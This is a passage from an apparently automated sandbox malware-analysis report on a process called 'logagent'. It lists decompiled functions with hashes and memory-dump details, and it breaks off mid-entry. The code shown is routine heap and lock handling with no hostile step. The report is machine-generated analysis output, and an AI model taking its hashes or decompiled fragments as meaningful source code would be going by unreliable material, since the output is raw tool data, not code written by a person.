                                              • Opcode ID: fae954d8cf163854bfbe2d0489eeba9b0bf64af6c7caa65e273ee46431933b23
                                              • Instruction ID: 54576913258ab5f00ed2eb00591ede2d5efdf76a1dea781295c6daf1a9b7f345
                                              • Opcode Fuzzy Hash: fae954d8cf163854bfbe2d0489eeba9b0bf64af6c7caa65e273ee46431933b23
                                              • Instruction Fuzzy Hash: B5E0D8B22052C4AFD734D751D144F357F9BEF61621F19849DE00847501C72BD982C215
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 052441E8 Relevance: .0, Instructions: 21COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 82%
                                              			E052441E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x52908f0);
				_t5 = E0520D08C(__ebx, __edi, __esi);
				if( *0x52a87ec == 0) {
					E051CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x52a87ec == 0) {
						 *0x52a87f0 = 0x52a87ec;
						 *0x52a87ec = 0x52a87ec;
						 *0x52a87e8 = 0x52a87e4;
						 *0x52a87e4 = 0x52a87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L05244248();
				}
				return E0520D0D1(_t5);
			}





                                              0x052441e8
                                              0x052441ea
                                              0x052441ef
                                              0x052441fb
                                              0x05244206
                                              0x0524420b
                                              0x05244216
                                              0x0524421d
                                              0x05244222
                                              0x0524422c
                                              0x05244231
                                              0x05244231
                                              0x05244236
                                              0x0524423d
                                              0x0524423d
                                              0x05244247

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9763bb50ea5a5518cde18b86283639ac3d411f350715b3ef4340e6851ba30a96
                                              • Instruction ID: 28a23c204b1d20cca3b69787c98bba981c3b8c32a060d364d459e99610bf51e8
                                              • Opcode Fuzzy Hash: 9763bb50ea5a5518cde18b86283639ac3d411f350715b3ef4340e6851ba30a96
                                              • Instruction Fuzzy Hash: 74F0157EA72700CFCBA2EFA8A90E7183AB5FF44310F80416AA108AB2C4CB744580CF41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0526D380 Relevance: .0, Instructions: 21COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0526D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L051BE8B0(__ecx, _a4, 0xfff);
					L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                              0x0526d38a
                                              0x0526d39b
                                              0x0526d3b1
                                              0x00000000
                                              0x0526d3b6
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                              • Instruction ID: 124c8492a0c643896d0b1512139def8af684a073f0abac0c61ff809366d2d5cf
                                              • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                              • Instruction Fuzzy Hash: 5CE0C232380609BBEB226E44CC04FB9BB1AEF507A0F104031FE089A691C6B19CA1DAD4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051EA185 Relevance: .0, Instructions: 20COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E051EA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x52a67e4 >= 0xa) {
					if(_t5 < 0x52a6800 || _t5 >= 0x52a6900) {
						return L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E051D0010(0x52a67e0, _t5);
				}
			}





                                              0x051ea190
                                              0x051ea1a6
                                              0x051ea1c2
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051ea192
                                              0x051ea192
                                              0x051ea19f
                                              0x051ea19f

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cf3b43cd1cb0bae0848e3e0a88c2073fda7ba7002bd67ec9d4d24b8648859a82
                                              • Instruction ID: 486cab45c226d5be1044945c4af06358668dbaaec6bd7e8f2be2b9ecdf01eb3d
                                              • Opcode Fuzzy Hash: cf3b43cd1cb0bae0848e3e0a88c2073fda7ba7002bd67ec9d4d24b8648859a82
                                              • Instruction Fuzzy Hash: AFD02E23A304007BC62EA3409CBCB353222EF84700FBA480CF1034E9E0EFA0A8D48119
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051E16E0 Relevance: .0, Instructions: 17COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E051E16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E051E1710(0x52a67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L051D4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                              0x051e16e8
                                              0x051e16ef
                                              0x051e16f3
                                              0x051e16fe
                                              0x00000000
                                              0x051e1700
                                              0x051e170d
                                              0x051e170d
                                              0x051e16f2
                                              0x051e16f2
                                              0x051e16f2
                                              0x051e16f2

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c153e82f29b0656e9299b585ffeec450e0812ccdec1cc916a0768401b5447e7e
                                              • Instruction ID: ba8c74b4d0cb17342ff065583378dc9b1b1a16016ecda03eb98f51e36a44fa01
                                              • Opcode Fuzzy Hash: c153e82f29b0656e9299b585ffeec450e0812ccdec1cc916a0768401b5447e7e
                                              • Instruction Fuzzy Hash: 41D0A73139050072DE2D5F10DC88B142262EB88B81F78005CF107494D1CFF1DCD2E458
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 052353CA Relevance: .0, Instructions: 16COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E052353CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E051CEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                              0x052353ca
                                              0x052353ce
                                              0x052353d9
                                              0x052353de
                                              0x052353e1
                                              0x052353e1
                                              0x052353e6
                                              0x052353f3
                                              0x00000000
                                              0x052353f8
                                              0x052353fb

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                              • Instruction ID: 53da1c8cdac5909bd0c1cec1b15fa7d78b4688b95b16a109834c24909020375f
                                              • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                              • Instruction Fuzzy Hash: A3E08C72A547809BCF16EB48C694F5EB7F9FF44B00F180448A00D5B661C734AC00CB00
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051E35A1 Relevance: .0, Instructions: 12COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E051E35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E051CEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                              0x051e35a1
                                              0x051e35a1
                                              0x051e35a5
                                              0x051e35ab
                                              0x051e35ab
                                              0x051e35b5
                                              0x00000000
                                              0x051e35c1
                                              0x051e35b7

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                              • Instruction ID: 8a46d4d0fd0fdc99bfafbd6fae78f07dddae894ddaeb731652532f9a0de34ef8
                                              • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                              • Instruction Fuzzy Hash: C9D0A9316459809ADB1AEB10C218B7837B2BF0030AF5828A9801307A52C33A6A0FCE00
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051CAAB0 Relevance: .0, Instructions: 12COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E051CAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                              0x051caab6
                                              0x051caabb
                                              0x0521a442
                                              0x00000000
                                              0x0521a448
                                              0x0521a454
                                              0x0521a454
                                              0x051caac1
                                              0x051caac1
                                              0x051caac6
                                              0x051caac6

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                              • Instruction ID: eb0b019b48368aca390b5f176b4fd0193b8822cdc61d60da3b52dfad13743b4f
                                              • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                              • Instruction Fuzzy Hash: D6D0C935352980CFD617CB0CC554B1633A4BF04B44FC504D0E801CB721E72DD940CA00
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0523A537 Relevance: .0, Instructions: 11COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0523A537(intOrPtr _a4, intOrPtr _a8) {

				return L051D8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                              0x0523a553

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                              • Instruction ID: 3f26ee07c239910e9dcd83d3e8f3053e2c534242c1b2e3bfb86459f51eac219b
                                              • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                              • Instruction Fuzzy Hash: E5C08C33180248BBCB126F81CC00F46BF2AFB94B60F008010FA080B571C632E9B0EB94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051BDB40 Relevance: .0, Instructions: 11COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E051BDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L051D4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                              0x051bdb4d
                                              0x051bdb54
                                              0x051bdb5f
                                              0x051bdb56
                                              0x051bdb56
                                              0x051bdb5c
                                              0x051bdb5c

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                              • Instruction ID: df25a5420469cd5cab7c567f650d9d35deea0b813cb43abbd34ccbca34e71c4d
                                              • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                              • Instruction Fuzzy Hash: 94C08C30380A00AAEB261F20CE81B4076A0BB01B05F8400A0A302DA0F0DBF9D801E610
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051BAD30 Relevance: .0, Instructions: 10COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E051BAD30(intOrPtr _a4) {

				return L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                              0x051bad49

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                              • Instruction ID: 7a167a7549ea49a94550ef59dc1dcdec579363648c14acaa81449749d21b397d
                                              • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                              • Instruction Fuzzy Hash: B0C08C33180248BBC7126A45CD04F01BB29E790B60F000020B6040A6A28A32E860D598
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051D3A1C Relevance: .0, Instructions: 10COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E051D3A1C(intOrPtr _a4) {
				void* _t5;

				return L051D4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                              0x051d3a35

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                              • Instruction ID: b8f6e11bec1fb91f6d627cb687a0e5e7a6a1791465f89d1fcac4578f85c01733
                                              • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                              • Instruction Fuzzy Hash: 13C08C32180248BBCB126E41DC40F01BB29E790B60F000020B6040A56186B2EC60D598
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051E36CC Relevance: .0, Instructions: 10COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E051E36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L051D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                              0x051e36d2
                                              0x051e36e8
                                              0x051e36d4
                                              0x051e36e5
                                              0x051e36e5

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                              • Instruction ID: 27a8718ccf48dc975ccfb9fc23113c1d650040a38526a7f5de0d15bc8b6df154
                                              • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                              • Instruction Fuzzy Hash: D6C02B70350840BBDB151F30CD80F14B254F700A21F6407547231464F0D7B9AD00D110
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051C76E2 Relevance: .0, Instructions: 10COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E051C76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                              0x051c76e4
                                              0x00000000
                                              0x051c76f8
                                              0x051c76fd

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                              • Instruction ID: 80e8374ec023c347d9510ba483d591e559fd9d6cfa29209d9ae6e39612ee9711
                                              • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                              • Instruction Fuzzy Hash: 7BC08C712411805AFB2A6708CE2AF387A50FB18708FC801DCAA02094E2C3AAA802CA08
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051D7D50 Relevance: .0, Instructions: 7COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E051D7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                              0x051d7d56
                                              0x051d7d5b
                                              0x051d7d60
                                              0x051d7d5d
                                              0x051d7d5d
                                              0x051d7d5d

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                              • Instruction ID: 8ae9f2595e8bcd5581a19a9ad07ff95bf021ec74caecc22dff75d1da9ada563e
                                              • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                              • Instruction Fuzzy Hash: 05B092383019408FCE16DF18C080F2573E4FB45A40B8400D4E400CBA20D329E8008A00
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051E2ACB Relevance: .0, Instructions: 5COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E051E2ACB() {
				void* _t5;

				return E051CEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                              0x051e2adc

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                              • Instruction ID: 511de86780f12729356f0df52d8e6cc4292d7f82a90a2cbdea368373a9ce4cf5
                                              • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                              • Instruction Fuzzy Hash: C3B01232D50440CFCF03EF40C650B297735FB00750F0944D4900127931C329AC01CB40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051FAD30 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a2b0cc896bd395f8cbb559dd55e33bc3205e31ed9687b5402c8772474640f086
                                              • Instruction ID: 0f871503d178ff623d37244365b45c3a8f70f88936832329bd4e881bf77025b5
                                              • Opcode Fuzzy Hash: a2b0cc896bd395f8cbb559dd55e33bc3205e31ed9687b5402c8772474640f086
                                              • Instruction Fuzzy Hash: 0D900272A1700012924071A948546464016ABE0791B95D011A0504558D89D48A5563E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F9520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7439b277e880406bd5c1345811bc1844dc0467596a3d7a39587c3fcdd456ef58
                                              • Instruction ID: 0f15b69018c68342dc80799905b15a7622a66425455966e775385f504be21aa2
                                              • Opcode Fuzzy Hash: 7439b277e880406bd5c1345811bc1844dc0467596a3d7a39587c3fcdd456ef58
                                              • Instruction Fuzzy Hash: 379002E2213140924600A2A98444B0A45159BE0251B91D016E1044564DC5E58851A175
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F9950 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ffa49aa15eef38360c5895372ae5175eace936e0a47aed3acbf97c0cec51114a
                                              • Instruction ID: 68a43e94e7d8b24f8ec066fbcbe18b85c7729b542d508e46617dec9749bf9ea6
                                              • Opcode Fuzzy Hash: ffa49aa15eef38360c5895372ae5175eace936e0a47aed3acbf97c0cec51114a
                                              • Instruction Fuzzy Hash: EE9002A221340403D24065A9484460700159BD0352F91D011A2054559F8AE98C517175
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F9560 Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 08b699fca6d0f965ee36620282dd931adb63bac5c80c63c031189ea63b6c6a81
                                              • Instruction ID: 3a3e9512ecc8cf9f26fb0791dbd88f6172a36270da285596aa83e1587a00f25d
                                              • Opcode Fuzzy Hash: 08b699fca6d0f965ee36620282dd931adb63bac5c80c63c031189ea63b6c6a81
                                              • Instruction Fuzzy Hash: DD900266233000020245A5A9064450B0455ABD63A13D1D015F1406594DC6E188656361
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F99D0 Relevance: .0, Instructions: 4COMMON
